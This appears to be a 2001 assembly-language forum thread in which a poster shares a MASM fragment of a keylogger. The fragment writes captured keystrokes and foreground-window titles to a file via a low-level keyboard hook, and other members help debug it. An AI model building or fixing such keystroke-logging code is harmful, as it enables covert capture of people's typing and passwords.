invoke GetForegroundWindow
.IF eax == hWndFG
invoke WriteFile, fWnd, addr lParam, 1, addr bytesWritten, NULL
mov hWndFG, eax
invoke GetWindowText, hWndFG, addr AppName, 1024
invoke WriteFile, fWnd, addr AppName, eax, addr bytesWritten, NULL
invoke WriteFile, fWnd, addr CRLF, 2, addr bytesWritten, NULL
; invoke PostMessage, hWnd, WM_KEYHOOK, wParam, lParam

Here is a snippet of my code. If the hWnd changes from keystroke to keystroke, the Application name will be in the file, otherwise a keystroke will be logged. I think the code speaks for itself.

This P.O.S code complies fine, but when I go to run it, it doesn't work correctly. ONLY the appname is logged, in place of keystrokes. I had to comment out the postmessage line to stop the prog from writing the appname over and over! I'm not changing the active window when I run the program. Is my logic wrong? Is the window handle constantly changing?

Please help..... in desprate need.....

thanks in advance........
Posted on 2001-10-16 22:27:19 by lackluster
Afternoon, Lackluster.

I dunno if this'll help, however it's worth a try.

It could be that the *.if....else* macro is mucking around with eax (This is a total guess - I really wouldn't have a clue ;) ).
Try adding another *invoke GetForegroundWindow* straight after the *.ELSE* and see if it works.

Posted on 2001-10-17 02:30:31 by Scronty
lackluster, forgive me if my question is stupid but is your hWndFG a "global" variable?
Posted on 2001-10-17 02:48:18 by japheth
and why do you think that lParam should have address of
the byte made by keystruck?
Posted on 2001-10-17 04:19:07 by The Svin
My best guess would be how have you declared 'hWndFG'.

Same as what japheth was saying, if you have made hWndFG a LOCAL varible on the stack, its value is highly likly to change each time the WM_KEYHOOK message is recieved.
Posted on 2001-10-17 05:18:15 by huh
The variable is global defined in the .data section as:
hWndFG dd 0

WM_KEYHOOK is defined under .const as:

It does return a keystroke. I'm using WH_KEYBOARD_LL hook type and passing the time stamp in wParam, and the char (after converting the VK) in lParam.

I haven't yet been home to check Scronty's (great sig by the way ;)) suggestion.
Posted on 2001-10-17 10:17:49 by lackluster
NOpe, that didn't work either. I changed the .IF .ELSE to cmp jne. I think I've tried everything. I'm going to go cry like a schoolgirl now...
Posted on 2001-10-17 19:46:04 by lackluster

use OutputDebugString to display the hWnd and other interesting stuff. Since the low level keyboard hook is a bit time critical, I suggest to deactivate the writing to files in the first step.

To show the output of OutputdebugString in Windows NT/2000, there is freeware available.

Posted on 2001-10-18 03:38:17 by japheth
Actually that's the reason for my most recent post (Int-->String). I was going to display the hWnd in the messageboxes. Would there be an advantage to using the OutputDebugString instead?
Posted on 2001-10-18 08:30:10 by lackluster